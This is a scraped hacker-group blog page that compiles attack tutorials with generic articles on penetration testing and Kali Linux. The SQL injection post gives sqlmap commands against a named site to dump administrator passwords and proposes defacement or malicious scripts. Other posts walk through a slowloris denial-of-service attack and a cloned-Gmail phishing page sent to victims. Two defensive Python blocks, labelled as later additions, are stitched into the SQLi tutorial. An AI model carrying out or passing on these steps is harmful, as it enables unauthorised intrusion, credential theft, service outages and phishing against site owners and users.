> Det_Not Hacker | White Hat Aliance | Angkasa Hacker Team | Indonesia | Satu Gertakan Untuk Pertahankan Bumi Pertiwi | Safework of Angkasa Pura database, server MIL.ID | Thanks for all support : BD Green Hat, Nation blood, ID Codding, Jakarta Style cracking, Newbie's HACKER, US ortodox specialist | Learn your skill here with our style.
Title Hacking Website with sqlmap on Backtrack
Author Unknown
Date and Time 17:01

Hacking website by sqlmap and backtrack.

This style by : http://realhackerspoint.blogspot.in

In this tutorial, we will learn how to find a vulnerable link in a website, exploit that link by SQL injection, and take total control over any website. This includes access to the usernames and passwords database, defacing it, address forwarding and much more. This is the most powerful attack against any website and can create a world-wide mess if done for evil purposes.
So what are we waiting for? Let's begin ...

What Do We Need For This Attack ?

# Backtrack 5 (would work on Windows too, just find a SQL injecting software)
# SQLMAP - Automatic SQL injection and database takeover tool (included in Backtrack)
# Internet access
# Brains and balls.
# Lots of time.

Step-1 : Finding A Vulnerable Link.

This is the MOST difficult step, because there are thousands of links in a website and only some of them are vulnerable to SQL injection. So how to do it?
The trick is to dig into the website and look for anything that might have access to an outside server.
We will use a scanner provided by Backtrack called "UniScan", which is good at finding vulnerable links. To open it, type this in your console (Backtrack terminal) :

cd /pentest/web/uniscan && ./uniscan.pl
Follow the onscreen commands and run this tool to find the bug links; sure, you can use other scanners.
Once you have found a link, check it by adding (') (ignore the brackets please) at the end of the link.
Almost anything with an id, or anything behind the php? and behind the =, can be tested.
This is because we know it selected something from the database, and this might be an entry point.
For example :
Original "vulnerable" link : http://www.waterufo.net/item.php?id=200
After adding the symbol : http://www.waterufo.net/item.php?id=200'
If a MySQL error occurs, then it is most likely vulnerable to SQL injection.
Example of a MySQL error:
You have an error in your SQL syntax; 
Check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''
YAYY !
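
Why the appended quote produces a database error, and what removes it, shown as an added example that is not part of the original tutorial. Python's sqlite3 stands in for the PHP/MySQL page; the table, sample rows and function names are constructed for illustration.

```python
import sqlite3


def make_db():
    """Constructed in-memory table standing in for the site's MySQL database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO items VALUES (?, ?)",
                   [(200, "water filter"), (201, "hand pump")])
    return db


def item_page_vulnerable(db, raw_id):
    """The pattern the quote test finds: request text pasted into the SQL string."""
    sql = "SELECT name FROM items WHERE id = " + raw_id
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error as exc:
        # Returning the driver's message to the browser is what makes the flaw
        # visible from outside (the "error in your SQL syntax" page).
        return 500, "SQL error: %s" % exc
    return (200, row[0]) if row else (404, "not found")


def item_page_hardened(db, raw_id):
    """Same lookup: validate the id, bind it as a parameter, hide driver errors."""
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9):
        return 400, "bad request"
    try:
        # The value travels separately from the SQL text, so it can never
        # change the structure of the statement.
        row = db.execute("SELECT name FROM items WHERE id = ?",
                         (int(raw_id),)).fetchone()
    except sqlite3.Error:
        return 500, "internal error"  # details belong in the server log only
    return (200, row[0]) if row else (404, "not found")


if __name__ == "__main__":
    db = make_db()
    for value in ("200", "200'"):
        print(repr(value), item_page_vulnerable(db, value), item_page_hardened(db, value))
```

On the PHP/MySQL stack the tutorial targets, the same fix is a prepared statement (PDO or mysqli) with the id bound as an integer, plus error display turned off in production.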

Step 2 : Starting and Setting Up SQLMap :

SQLMap is the best SQL injecting tool ever made. It is good for both beginners and experts. To start it, type the below command in console :
cd /pentest/web/scanners/sqlmap
Once it has started, change this command to your requirements and press enter :
./sqlmap.py -u (your bug link here) --level 5 --risk 3 --dbs

This command will scan the full website with the help of the vulnerable link you inserted.
Now let the scan continue and wait for something like this :

[screenshot: real hackers point]

If this appears, you have made your path inside that website. Now press N to stop the scan, because we have already found and exploited the vulnerability.
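
Seen from the server, the quote test of Step 1 and the scan of Step 2 leave a recognisable trail in the access log. The added example below (not from the original tutorial) flags it in constructed combined-format log lines; the threshold, reason labels and sample User-Agent strings are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines in combined log format; the IP addresses are
# documentation ranges and the User-Agent strings are sample values.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /item.php?id=200 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /item.php?id=200%27 HTTP/1.1" 500 310 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /item.php?id=200 HTTP/1.1" 200 5120 "-" "sqlmap/1.0 (http://sqlmap.org)"',
    '203.0.113.9 - - [01/Jan/2024:10:00:10 +0000] "GET /item.php?id=200%27%22 HTTP/1.1" 500 310 "-" "sqlmap/1.0 (http://sqlmap.org)"',
    '203.0.113.9 - - [01/Jan/2024:10:00:11 +0000] "GET /item.php?id=200%29 HTTP/1.1" 500 310 "-" "sqlmap/1.0 (http://sqlmap.org)"',
    '192.0.2.44 - - [01/Jan/2024:10:00:12 +0000] "GET /search.php?q=O%27Brien HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
ERROR_BURST = 3  # assumed threshold: 5xx responses per client and path


def scan(lines):
    """Return {client_ip: set of reasons} for requests that look like SQLi probing."""
    findings = defaultdict(set)
    errors = defaultdict(int)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # unparsable lines are skipped, not guessed at
        ip, ua, status = m["ip"], m["ua"], int(m["status"])
        url = urlsplit(m["target"])
        for _name, value in parse_qsl(url.query, keep_blank_values=True):
            # A value that starts as a number and then carries extra characters
            # (200' or 200") is what the quote test from Step 1 sends.
            if re.match(r"\d+\D", value):
                findings[ip].add("numeric-param-tampered")
        if "sqlmap" in ua.lower():
            # Only catches a tool left on its default User-Agent; absence proves nothing.
            findings[ip].add("scanner-user-agent")
        if status >= 500:
            errors[(ip, url.path)] += 1
            if errors[(ip, url.path)] >= ERROR_BURST:
                findings[ip].add("server-error-burst")
    return dict(findings)


if __name__ == "__main__":
    for client, reasons in scan(SAMPLE_LOG).items():
        print(client, sorted(reasons))
```

The free-text search value `O'Brien` is deliberately not flagged: a quote is only suspicious in a parameter that otherwise carries a number.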

Step 3 : Finding The Columns And Tables ( The Guess Game ) -

As we all know, the data on a website is stored in databases. Inside those databases there are tables and columns, and inside them is the required data.
Suppose my database is waterufo.net; you have to change it as per your requirements. I'm just supposing so you can understand. We will now type this command to get the tables :

./sqlmap.py -u http://www.waterufo.net/item.php?id=200 --tables -D waterufo_net

You will get something like this :

[screenshot: real hackers point]

Now run this command to grab the columns :

./sqlmap.py -u http://www.waterufo.net/item.php?id=200 --columns -T fl_users -D waterufo_net

It will display the columns in the table "fl_users", something like this :

[screenshot: real hackers point]



Step 4 : Retrieving Usernames And Passwords -

To retrieve the column values, type --dump at the end of the previous query.
For example :

./sqlmap.py -u http://www.waterufo.net/item.php?id=200 --columns -T fl_users -D waterufo_net --dump

You will be presented with the values stored in those columns. In my case, that was the list of administrator usernames and passwords :

[screenshot: By Hackforums]

So now you have the administrator usernames and passwords, you can do a lot of things with them, for example :

-> Shut down the website
-> Insert a malicious script in the website
-> Divert their traffic to another place
-> Write those passwords on a brick and hit your neighbor's kid.

Any of the above will do a lot of damage.

Title How to DDos attack to server on Backtrack
Author Unknown
Date and Time 16:51
This is a very quick and simple tutorial on performing a denial of service attack using the custom Linux kernel Backtrack 5. If you do not have Backtrack for instructions. The first thing you will need is a file called slowloris.pl. This file can be downloaded into Backtrack from:

HERE

Copy all the text and paste it into a Gedit document, then save it as slowloris.pl to your desktop. Now you must find the IP of the server. You can do this in many ways: search Google for DNS lookup, etc.

After that in terminal type:


Code:
cd Desktop/
Code:
./slowloris.pl -dns (ip of the server)

Now this may take a while, but this will take down many servers. You can also open other terminals and do the same thing to speed up the process.

SOME SERVERS ALSO HAVE A LOAD BALANCER, THIS WILL CAUSE THE DDOS NOT TO WORK !

For a DDoS attack, do this with several computers (5-6) & u can take big websites down :)!!
 

Title How to Get an Account Facebook With Web Clone in Backtrack
Author Unknown
Date and Time 04:00
First open your Backtrack terminal and type ifconfig to check your IP.

Now open your Backtrack terminal again and type cd /pentest/exploits/set
Now open the Social Engineering Toolkit (SET): ./set

Now choose option 2, “Website Attack Vectors”.

In this option we will select option 4, “Tabnabbing Attack Method”.

In this option we will choose option 2, “Site Cloner”.

Enter the URL of the site you want to clone, in this case http://www.gmail.com, and hit enter. SET will clone the web site. Press return to continue.
Now convert your URL into a Google URL using goo.gl and send this link address to your victim via email or chat.

Title Penetration Testing Methodologies
Author Unknown
Date and Time 22:29
In penetration testing, a methodology is needed just as in any other testing procedure. The methodology makes sure that the process is right and that the result of the testing is reliable and can be used in the future development of the tested system as well. There are many different methodologies that anyone doing this testing can use. The methodologies are issued by different departments and have different characteristics. This article covers some of the most common penetration testing methodologies.

The first commonly used penetration testing methodology is the ISSAF methodology. The ISSAF is the flagship project of the OISSG; the latest version is version 0.2, which is available for any industry that needs to do this testing. This methodology is the first one that provides validation for bottom-up security strategies. The next well-known methodology is the OSSTMM, the Open Source Security Testing Methodology Manual. It is a peer-reviewed methodology for security metrics and tests.

This methodology has five channels for conducting the security test to maximize the result, including data and information controls and the security awareness level of the personnel. The last one is the Open Web Application Security Project, or OWASP. This is an open-source application security project of the OWASP community. The community provides methodologies, tools, technologies, documentation and articles related to security testing of a particular system. These three are the most commonly used methodologies for conducting the testing of network or computer system security known as penetration testing.

Title Best Penetration Testing Tools
Author Unknown
Date and Time 22:28
Penetration testing needs tools to make sure that the process goes smoothly and gives the best possible result. There are many tools available for this testing that you could choose to perform the testing procedure. Among them, this article covers some of the best. The first one is Acunetix, which is available in a free version and a paid version. This security testing tool has a client script engine analyzer that generates a very detailed report of security vulnerabilities and issues. The latest version is version 8, which has a new HTTP Denial of Service test module.

The second of the best penetration testing tools is Aircrack-ng, which offers many tools to maximize the penetration testing that you are going to do. The tools provided by Aircrack-ng include airdecap-ng, airmon-ng, aireplay-ng, airtun-ng, airodump-ng, and a couple more. Each tool has a different function from the others. Aircrack-ng also has a free security tool called a GUI interface, just like many other tools for the penetration test.

The third tool considered among the best is Cain & Abel, often called simply Cain. It is mainly known as a tool to recover any password. The penetration tester can recover any password by getting into the network and cracking the encrypted password on the system. Although it is considered the best tool for penetration testing, it is also known to have a script-kiddie character. Getting the best tools for any activity is important to maximize the result. Therefore, when conducting penetration testing, you should consider choosing one of these best penetration testing tools to get the best result from the testing procedure.

Title More Things to Know About Penetration Testing
Author Unknown
Date and Time 22:26
The ultimate goal of penetration testing is to find all the security vulnerabilities in the system being tested. Something is considered a vulnerability of the system whenever it increases the possibility that an attacker can attack the security of the system and then gain control of the system itself. Control of the system in a particular organization or group should never be obtained by anyone but the owner or administrator, for the safety of the organization. The most common things considered vulnerabilities of a system are software bugs, system design flaws, and system configuration errors. These can become a more powerful threat to the system when they are combined. Thus penetration testing is needed to prevent such vulnerabilities from disturbing the system.

People might then wonder who or what should conduct this penetration testing. Since the threats to a network or computer system are so many, almost anyone who relies on a computer or network system should perform this type of testing. Nevertheless, there are four most common ideas of who should perform the testing. First is an organization or industry that has regulated data types. This is usually one that deals with financial services, such as credit-card data. Second is a product vendor with regulated clients or customers. One example of this is a web developer.

Third is one whose systems have been hacked before and that found the effect of the hack to be terrible. Fourth is one that simply thinks it would be better to test the security of the system before something bad happens to it. Those are the four common ideas about who or what should perform this penetration testing.

Title Things to Consider in Doing the Penetration Testing
Author Unknown
Date and Time 22:25
There are two things that could make people look for information related to penetration testing. First, someone else may have suggested that they perform the testing to make sure that their system is safe before any attack occurs. Second, their system may have been hacked or penetrated before, so they want to make sure their newly established system is safe and hack proof. Whichever is the reason, it is clear that penetration testing is needed in the operation of any organization, or anything else, that uses a computer or network system.

Moreover, there are a couple of things that you have to make sure of in dealing with penetration testing. This is an important thing to do, so you have to make sure that everything is at its best to guarantee its success. First, ask your colleagues if they know a recommended vendor that could perform the testing. Second, once you find a vendor, ask the vendor for some references from organizations similar to yours.

Third, ask the vendor about similar testing projects that they have done previously. Fourth, ask the vendor for a testing report from their previous testing so that you can evaluate the report. Fifth, ask the vendor for complete information on the staff who are going to do the testing for you. You can also do a background check to make sure that the staff are qualified. Sixth, make sure to have an agreement on the testing that will be performed so that there is no miscommunication during the testing. When you consider all of the things stated above before testing your system, you will be able to get the best possible outcome from the penetration testing.

Title The Importance of Penetration Testing
Author Unknown
Date and Time 22:24
There are reasons that penetration testing is important and valuable to do. First, this testing can determine the feasibility of the attack vectors that are possible against a computer or network security system. Second, this testing can find high-risk vulnerabilities that are actually the result of a combination of low-risk vulnerabilities on a particular network or computer system. Third, this testing can show vulnerabilities or threats that cannot be detected just by using automated vulnerability scanner software. Fourth, this testing can show the result or impact of attacks on the vulnerabilities in the computer or network system. Fifth, this testing can provide reasons to invest in the development of a more sophisticated network or computer system in the future. Those are the five reasons that make penetration testing very important to do.

Moreover, penetration testing is a kind of testing that needs to be done regularly on a system that is changed regularly as well. The process of the testing can simply be divided into two parts. The first part of the testing is finding combinations of legal operations that lead to an illegal operation. This first part can be done by leveraging some flaws and then shaping the payload so that it is considered a valid operation.

The second part is finding the specific illegal operations, which are often called payloads as well. There are companies and organizations that keep large databases containing known exploits. There is a certificate for this testing known as the Certified Penetration Tester, or CPT, which is managed by the Information Assurance Certification Review Board, or IACRB. An exam candidate must pass a multiple choice exam and a practical exam, which is a penetration test against some servers in a virtual environment, to be certified by the IACRB.

Title What is Penetration Testing?
Author Unknown
Date and Time 22:24
Penetration testing is a well-known method of computer and network security evaluation. Generally this testing is done by simulating an attack on the computer or network being tested. This method of testing the security of a computer or network is known to be the oldest method, in use since the 1970s. The Department of Defense performed this testing in the 1970s in order to describe the weaknesses in the computer systems of that time. After the weaknesses were described, the Department of Defense initiated the development of more secure computer systems thanks to penetration testing.

Penetration testing involves analysing the computer system for any possible vulnerability. These vulnerabilities could be caused by poor system configuration, hardware or software flaws, or technical countermeasures as well. The analysis is carried out from the position of a possible attacker, which could involve more exploitation of the security vulnerabilities of the computer or the network.

The result of this testing is then presented to the owner of the tested systems. The result presented to the owner contains the security issues along with the effect of those issues on the organization using the system. The best solution for the issues is also stated in the result.

Once the owner of the computer or network system has been given the result of this testing, it is fully the owner's right to decide what to do next. This testing is very widely used by many organizations to make sure that their computer or network system is safe before it is publicly exposed. Thus it is important for any new organization using a computer or network in its operation to have penetration testing done before starting any of its operation.

Title Kali Linux Review, The Linux Penetration Testing Distribution
Author Unknown
Date and Time 22:22
Kali Linux is a great successor to BackTrack, a Linux penetration distro/operating system, loved by many people, that is aimed at penetration testers and security professionals. Read the following brief history of how Kali Linux came to be. BackTrack has been very familiar over the last seven years. It is created and managed by Offensive Security.

Kali Linux is different: for the fine folks over at Offensive Security, solving the 'inherent problems' of BackTrack needed a complete re-write. The problem was that the too many pentesting tools embedded within BackTrack all struggled to co-exist within the dependencies. BackTrack v1-v5 were a headache for dependencies. Many penetration and security tools were not regularly updated by their creators, so trying to update the entire OS often caused conflicts, and tools would stop working, crash or even cause other tools to crash. One example is Ettercap, which was not updated for a long time.

To solve the problem, the distro was rebuilt from the bottom up by making Kali Debian based. Before, with BackTrack, there was a /pentest/ folder. Now it is all updated and managed by Debian packages.
Kali Linux has 300 tools which automatically work within the Kali ecosphere. Kali has also been created with a clean "Filesystem Hierarchy Standard" layout and offers vast plug-and-play wireless support, with the only exception appearing to be Broadcom.
Another interesting feature of Kali Linux is that it supports the ARM architecture, so you can use the distro on Raspberry Pis, Chromebooks etc. You can also create your own file with Kali through the Debian live-build feature.

In summary, Kali is a well thought out penetration testing distribution which had to address its previous problems with regard to updates. It has two modes, forensics and default, both of which run best in GNOME. All the usual pentesting tools work with the distro with ease, and the file hierarchy is the same as in previous BackTrack versions. For pentesting, Kali Linux is clearly an awesome OS with the world's best suite of pentesting tools that can all be preconfigured. Couple that with the very large and loyal community, the bug tracking service and the attention to detail. It is a solid pentesting Linux distribution.